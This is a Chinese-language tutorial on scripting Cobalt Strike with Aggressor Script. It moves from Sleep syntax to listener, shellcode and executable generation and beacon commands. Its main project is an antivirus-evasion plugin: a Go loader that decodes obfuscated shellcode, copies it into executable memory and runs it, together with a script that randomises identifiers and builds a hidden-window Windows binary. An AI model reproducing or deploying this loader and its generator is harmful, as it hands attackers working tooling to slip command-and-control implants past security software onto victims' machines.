暂无简介
如何学习
文章
https://xz.aliyun.com/t/5887
https://422926799.github.io/posts/e5e87074.html
如果是刚开始接触可以参考上述两个,都是翻译和写的比较清楚的
本文参考上述两个博客,结合开发插件添加了一些没提到的东西,主要看 cs开发的菜单、对话框、文件,beacon之外、beacon之内的操作,其他东西没啥区别。
官方文档
sleep语言:http://sleep.dashnine.org/manual/
cs:https://trial.cobaltstrike.com/aggressor-script
(上述两个博客提到的官方地址失效了,这是新的)
一定要看
https://trial.cobaltstrike.com/aggressor-script/functions.html 所有的方法都在里面
default.cna
反编译jar包,找类似功能,直接看他是怎么写的
简介
agscript为Aggressor Script的简写,直译攻击者脚本,基于Raphael Mudge的Sleep语言的二次开发。是CobaltStrike 3.0之后版本中内置的脚本语言。
脚本控制台
Cobalt Strike提供了交互式的脚本控制台。 通过控制台可跟踪,配置,调试以及管理脚本。可以通过View- > Script Console获得进入agscript控制台。
基础命令:
命令行
./agscript [host] [port] [user] [password] [/path/to/script.cna]
on ready {
println("Hello World! ");
closeClient();
}
sleep基础
注意
语句之间需要有空格
$y=3
==>
$y = 3
println类似的函数叫warn,不同的是warn输出的内容中包含了当前代码的文件名和行数,对于开发者来说,调试定位错误特别方便
变量
$x = "Hello World";
$y = 3;
$z = @(1, 2, 3, "four");
$a = %(a => "apple", b => "bat", c => "awesome language", d => 4);
# 使用@和%函数即可创建数组和字典
数组
foreach $index ($data) {
println($index);
}
add($a, "wYYYYYYYYYYYYYYYYYYYYYYYY", - 1); #数组添加,默认在tm,0位前添加, 需要自己指定位置
remove($a, - 1, "data");//得指定删除的内容。。。
字典
#遍历
foreach $data (keys(%z)){
println("$data =>".%z[$data]);
}
foreach $key => $value (%z) {
println("$key => $value");
}
#删除
removeAt(%a, "data");
#或者删除多个key可以这么写 removeAt(%a, "data", "data2");
字符串
Sleep会插入双引号的字符串,这意味着以\$符号开头的任何以空格分隔的标记都将替换为其值。 特殊变量$+将插字符串与另一个值连接起来。
println("\$a is: $a and \n\$x joined with \$y is: $x $+ $y");
运行结果为:
$a is: %(d => 4, b => 'bat', c => 'awesome language', a => 'apple') and
$x joined with $y is: Hello World3
$a = "data"."data";#字符串的拼接 #字符串替换
on ready {
$a = "data"."data";
$a = replace($a, "data", "Fk");
println($a);
closeClient();
}
#获取字符串长度
$data = "dataing";
println(strlen($data));
#获取字符串指定位置
$data = "dataing";
println(substr($data, 0, 3));
#字符串指定内容替换成数组 (函数奇葩的要命,草)
$a = "data".".data";
$b = split('.', $a);
println($b);
#数组转字符串
println(join('|', @("ape", "bat", "cat", "dog")));
$str = "abc";
if ($str in $data) {
println(111);
}
函数
使用sub字符即可声明函数,传给函数的参数标记为$1,\$2,一直到\$n。函数可以接受无数个参数。 变量@_是一个包含所有参数的数组,$1,$2等变量的更改将改变@_的内容。
sub addTwoValues {
println($1 + $2);
}
addTwoValues("3", 55.0);
$addf = &addTwoValues;
$addf变量引用了&addTwoValues函数,调用并传参可以这样写:
[$addf : "3", 55.0];
[&addTwoValues : "3", 55.0];
[{ println($1 + $2); } : "3", 55.0];
addTwoValues("3", 55.0);
判断
(and->&&,or->|,true,false)
These predicate operators compare numbers.
OperatorDescription
== equal to
!= not equal to
< less than
> greater than
<= less than or equal to
>= greater than or equal to
These predicate operators compare strings.
OperatorDescription
eq equal to
ne not equal to
lt less than
gt greater than
isinis substring v1 contained in string v2
iswmis string v1 a wildcard match of string v2
循环
sub range {
# Returns a new function that returns the next number in the# range with each call. Returns $null at the end of the range# Don't worry, closures will come in the next chapter :)
return lambda( {
return iff($begin <= $end, $begin++ - 1, $null);
}, $begin = > $1, $end = > $2);
}
on ready {
foreach $value (range(1, 10)) {
println($value);
}
closeClient();
}
文件
逐行读取文件
$handle = openf("/etc/passwd");
while $text (readln($handle)) {
println("Read: $text");
}
一次性读完
$handle = openf("/path/to/key.pem");
$keydata = readb($handle, - 1);
closef($handle);
写入文件
$handle = openf(">data.txt");
println($handle, "this is some data.");
closef($handle);
写入文件方法2
$handle = openf(">out.txt");
writeb($handle, $data);
closef($handle);
cs开发
事件管理
使用on这个关键字可以为事件定义处理程序,当Cobalt Strike连接到团队服务器,就绪事件将触发
on ready {
show_message("welcome 老铁666");
}
控制台文本颜色
如果你想给Cobalt Strike的控制台添加一些色彩,通过\c,\U和\o转义即可告诉Cobalt Strike如何格式化文本。 值得提醒的是这些转义仅在双引号字符串内有效。
\cX就是告诉Cobalt Strike你想输出什么颜色,X是颜色的值:
\U是告诉控制台添加下划线,\o则是重置这些花里胡哨的东西。
命令快捷键
command test {
println("value: $1");
}
快捷键绑定
快捷键可以是任何ASCII字符或特殊键,快捷方式可能会应用一个或多个修饰符,修饰符修饰符仅为以下几个特定按键:Ctrl,Shift,Alt,Meta。脚本可以指定修饰符+键。
bind Ctrl + H {
show_message("DIO");
}
菜单项
popup help {
item("&blog", {
url_open("https://www.google.com");
});
menu "&game" {
item("&4399", {
url_open("https://www.4399.com/");
});
}
}
menubar("新菜单项","new");
对话框
dialog
$1 - title
$2 - 字典,设置默认值
$3 - 回调函数 传入参数 $1 对话框 $2 按钮名称 $3字典
menubar("新菜单项","new");
popup new{
item("&dialog",{dialogtest();});
}
sub dialogtest{
$dialog = dialog(“dialogTest”, %(listener => “” , bid =>”1”, bit => false , str => “string”,file =>””), &callback );
dbutton_action($dialog, “submit”);
dialog_description($dialog, “dialog 测试”);
drow_listener($dialog, “listener”, “选择监听器”);
drow_checkbox($dialog, “bit”, “x64: “, “使用64位的payload”);
drow_beacon($dialog, “bid”, “Session: “);
drow_text($dialog,”str”,”输入文本”)
drow_file($dialog, “file”, “Choose: “);
dialog_show($dialog);
}
sub callback {
println(“dialog $1” );
show_message(“Pressed $2 传入参数 $3”);
}
还有很多类型
drow_exploits
drow_proxyserver
drow_combobox
drow_site
。。。
文件
保存文件,第一个参数默认文件名,第二个文件函数
command file{
prompt_file_save("111", {
println($1);
local('$handle');
$handle = openf("> $+ $1");
println($handle, "I am content");
closef($handle);
}
);
}
beacon之外
监听器
创建
4.0及以上
listener_create_ext
$1 - 监听器名称
$2 - payload(e.g., windows/beacon_http/reverse_http)
windows/beacon_dns/reverse_dns_txt Beacon DNS
windows/beacon_http/reverse_httpBeacon HTTP
windows/beacon_https/reverse_https Beacon HTTPS
windows/beacon_bind_pipeBeacon SMB
windows/beacon_bind_tcp Beacon TCP
windows/beacon_extc2External C2
windows/foreign/reverse_httpForeign HTTP
windows/foreign/reverse_https Foreign HTTPS
$3 - 监听器选项(失败次数、超时、休眠时间等)
Key | DNS | HTTP/S | SMB | TCP (Bind) |
---|---|---|---|---|
althost | HTTP Host Header | |||
bindto | bind port | bind port | ||
beacons | c2 hosts | c2 hosts | bind host | |
host | staging host | staging host | ||
maxretry | maxretry | maxretry | ||
port | c2 port | c2 port | pipe name | port |
profile | profile variant | |||
proxy | proxy config | |||
strategy | host rotation | host rotation |
listener_create_ext("111", "windows/beacon_http/reverse_http",
%(host => "127.0.0.1", port => 80,
beacons => "127.0.0.1"));
信息
listeners
返回所有监听器名称
listener_info
返回单个监听器信息
command list {
foreach $listener (listeners()) {
println("name: $listener");
println("---------- $listener --------------");
%data = listener_info($listener);
foreach $key => $value (%data) {
println("$key => $value");
}
println("");
println("");
}
}
shellcode
shellcode
$1 - 监听器名称
$2 - true/false: 是否针对远程目标
$3 - x86|x64
command shellcode_create{
$listenname = $1;
$handle = $2;
$arch = $3;
if((strlen($listenname) > 0) && (strlen($handle) > 0) && (strlen($arch) > 0)){
println("Arch: $arch");
println("listen name: $listenname");
println("handle: $handle");
$data = shellcode($listenname, $handle, $arch);
$dk = openf(">shellcode.bin");
writeb($dk, $data);
closef($dk);
println("create shellcode.bin sucess");
}else{
println("shellcode_create <listenname> <remote_host> <arch>");
}
}
$shell_code = shellcode($3["listener"], false, $system);
$b64shell_code = base64_encode($shell_code);
$b64shell_code = replace($b64shell_code , 'A', '#');
$b64shell_code = replace($b64shell_code , 'H', '!');
$b64shell_code = replace($b64shell_code , '1', '@');
$b64shell_code = replace($b64shell_code , 'T', ')');
exe/dll
artifact
$1 - 监听器名称
$2 - 生成类型
dll\dllx64\exe\powershell\python\svcexe\vbscript
$3 - 弃用
$4 - x86|x64
command exe{
$data = artifact("ttt", "exe","x64");
$handle = openf(">out.exe");
writeb($handle, $data);
closef($handle);
}
beacon
信息
beacons 所有beacon信息
beacon_info 获取一个beacon特定信息
command info{
foreach $beacon (beacons()) { # 循环取出 会话ID
println($beacon);
println();
}
println(beacon_info($beacon['id'],"computer"));
}
命令
alias w{
bshell!($1, "whoami");
}
(bshell!
bshell
区别为在控制台是否显示执行的命令)
新beacon
可以初始化一个beacon,不要再手动sleep
binput
$1 - the id for the beacon to post to
$2 - the text to post
on beacon_initial{
bsleep($1,3,0);
binput($1, "shell whoami");
}
右键
prompt_text
显示一个对话框,向用户询问文本。
$1 - 对话框文本
$2 - 默认值
$3 - 回调函数,$1为用户输入
bshell
执行命令
$1 - beacon id(可以为数组)
$2 - 命令
bupload
文件上传
$1 - beacon id
$2 - 本地文件路径
bcd($1 , $path);
bmv(\$1 ,\$file1 , \$file2 )
popup beacon_bottom{
item "query user"{
prompt_text("Query User", "administrator", lambda({
bshell(@ids, "net user ".$1);
}, @ids => $1));
}
menu "test"{
item "query user"{
prompt_text("Query User", "administrator", lambda({
bshell($ids, "net user ".$1);
}, $ids => $1));
}
}
}
项目
bypassav
从一个老项目改起
源项目地址https://github.com/pureqh/bypassAV
当时有人写了插件,地址为https://github.com/hack2fun/BypassAV ,但是bypassAV后面更新了条件触发、随机生成go脚本等,于是参考前者写了一个新的。
主要学习cs免杀程序生成中
- 字符串处理
- 不同平台go:generate写法
- shellcode处理
写的
package main
import (
"encoding/base64"
"strings"
"syscall"
"unsafe"
"net/http"
"net/url"
)
{GONERATE}
var (
{2} = syscall.NewLazyDLL("kernel32.dll")
{3} = {2}.NewProc("VirtualAlloc")
{4} = {2}.NewProc("RtlMoveMemory")
)
func {5}({6} string){
{7} :=strings.Replace({6}, "#", "A", -1 )
{8} :=strings.Replace({7}, "!", "H", -1 )
{9} :=strings.Replace({8}, "@", "1", -1 )
{10} :=strings.Replace({9}, ")", "T", -1 )
{11},_ := base64.StdEncoding.DecodeString({10})
{12}, _, _ := {3}.Call(0, uintptr(len({11})), 0x1000|0x2000, 0x40)
_, _, _ = {4}.Call({12}, (uintptr)(unsafe.Pointer(&{11}[0])), uintptr(len({11})))
syscall.Syscall({12}, 0, 0, 0, 0)
}
func main() {
{14}, _ := url.Parse("http://127.0.0.1")
{15} := {14}.Query()
{14}.RawQuery = {15}.Encode()
{16}, {18} := http.Get({14}.String())
if {18} != nil {
return
}
{13} := {16}.StatusCode
{16}.Body.Close()
if {18} != nil {
return
}
var {17} int = 200
if {13} == {17} {
{5}("your base64shellcode")
}
}
menubar("免杀","bypass");
popup bypass {
menu "&shellcode加载" {
item("&go(条件触发)",{Generator();});
}
}
sub Generator{
$dialog = dialog(“title”, %(listener => “” , bit => false, url => “”), &build);
dbutton_action($dialog, “submit”);
dialog_description($dialog, “该插件用于快速生成免杀的可执行文件”);
drow_listener($dialog, “listener”, “Listener: “);
drow_checkbox($dialog, “bit”, “x64: “, “使用64位的payload”);
drow_text($dialog,”url”,”dizhi”)
dialog_show($dialog);
}
sub build{
if ($3[“bit”] eq “false”){
$system = “x86”;
$arch = “386”;
}else{
$system = “x64”;
$arch = “amd64”;
}
$code = base64_decode(“go文件base64”);
$shell_code = shellcode($3[“listener”], false, $system);
$b64shell_code = base64_encode($shell_code);
#replace(“A”,”#”).replace(“H”,”!”).replace(“1”,”@”).replace(“T”,”)”)
$b64shell_code = replace($b64shell_code , ‘A’, ‘#’);
$b64shell_code = replace($b64shell_code , ‘H’, ‘!’);
$b64shell_code = replace($b64shell_code , ‘1’, ‘@’);
$b64shell_code = replace($b64shell_code , ‘T’, ‘)’);
$handle = openf(“>shell.txt”);
println($handle, $b64shell_code );
closef($handle);
$code = replace ($code , “your base64shellcode”,$b64shell_code );
$code = replace ($code , ‘{url}‘, $3[“url”] );
$string1 = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”;
$string2 = “0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”;
$KEY_2 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_3 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_4 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_5 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_6 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_7 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_8 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_9 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_10 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_11 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_12 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_13 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_14 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_15 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_16 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_17 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_18 = charAt($string1,rand(52)).charAt($string2,rand(62));
$KEY_19 = charAt($string1,rand(52)).charAt($string2,rand(62));
$code = replace ($code , ‘{2}‘,$KEY_2);
$code = replace ($code , ‘{3}‘,$KEY_3);
$code = replace ($code , ‘{4}‘,$KEY_4);
$code = replace ($code , ‘{5}‘,$KEY_5);
$code = replace ($code , ‘{6}‘,$KEY_6);
$code = replace ($code , ‘{7}‘,$KEY_7);
$code = replace ($code , ‘{8}‘,$KEY_8);
$code = replace ($code , ‘{9}‘,$KEY_9);
$code = replace ($code , ‘{10}‘,$KEY_10);
$code = replace ($code , ‘{11}‘,$KEY_11);
$code = replace ($code , ‘{12}‘,$KEY_12);
$code = replace ($code , ‘{13}‘,$KEY_13);
$code = replace ($code , ‘{14}‘,$KEY_14);
$code = replace ($code , ‘{15}‘,$KEY_15);
$code = replace ($code , ‘{16}‘,$KEY_16);
$code = replace ($code , ‘{17}‘,$KEY_17);
$code = replace ($code , ‘{18}‘,$KEY_18);
$code = replace ($code , ‘{19}‘,$KEY_19);
prompt_file_save(“aabbcc.exe”, {
$path = “$1”;
if (“Windows“ iswm systemProperties()[“os.name”]) {
$path = replace($path, “\\“, “\\\\“);
$build = “//go:generate cmd /c set GOOS=windows&& set GOARCH= $+ $arch $+ && go build -o $path -ldflags "-w -s -H=windowsgui" C:\\windows\\temp\\temp.go && del C:\\windows\\temp\\temp.go”;
$gofile = “C:\\windows\\temp\\temp.go”;
$handle = openf(“> $+ $gofile”);
}else{
$build = “//go:generate bash -c "GOOS=windows&& GOARCH= $+ $arch && go build -o $path -ldflags "-w -s -H=windowsgui" /tmp/temp.go && rm /tmp/temp.go"“;
$gofile = “/tmp/temp.go”;
$handle = openf(“> $+ $gofile”);
}
$code = replace($code, ‘{GONERATE}‘, $build);
writeb($handle, $code);
closef($handle);
$space = “ “;
exec(“go generate $+ $space $+ $gofile”);
show_message(“save to $+ $1”);
});
}
批量note
有时候会遇到上线主机多,不同用户,不同上线方式,需要区分,批量标注。
(cs可以通过shift、ctrl选择多个beacon,然后note批注)。、
当时无法通过对beacon信息数组修改,然后看了default.cna发现有beacon_note函数,然后设置条件提取beacon id到数组里调用beaconnote修改批注。(所有`beacon***`第一个参数均支持beacon id数组,也就是可以对多个beacon同时操作)
popup beacon_bottom{
item "&Note2" {
println( $1 [0]);
local('$note');
$note = beacon_info($1[0], "note");
println($note)
prompt_text("Set Beacon Note2:", $note, lambda({
mynote($bids,$1);
}, $bids => $1));
}
}
sub mynote{
$bids = $1;
$note = $2;
println($1);
println($2);
$bid = @();
foreach $entry (beacons()) { # 循环取出 会话ID
$com = beacon_info($bids[0],'computer');
$user = beacon_info($bids[0],'user');
if ($com eq $entry['computer'] && $user eq $entry['user']){
println($com );
println($entry['computer'] );
add( $bid, $entry['id']);
}
}
println($bid);
beacon_note($bid, $note);
}
- 本文作者: best0st
- 本文来源: 先知社区
- 原文链接: https://xz.aliyun.com/t/11404
- 版权声明: 除特别声明外,本文各项权利归原文作者和发表平台所有。转载请注明出处!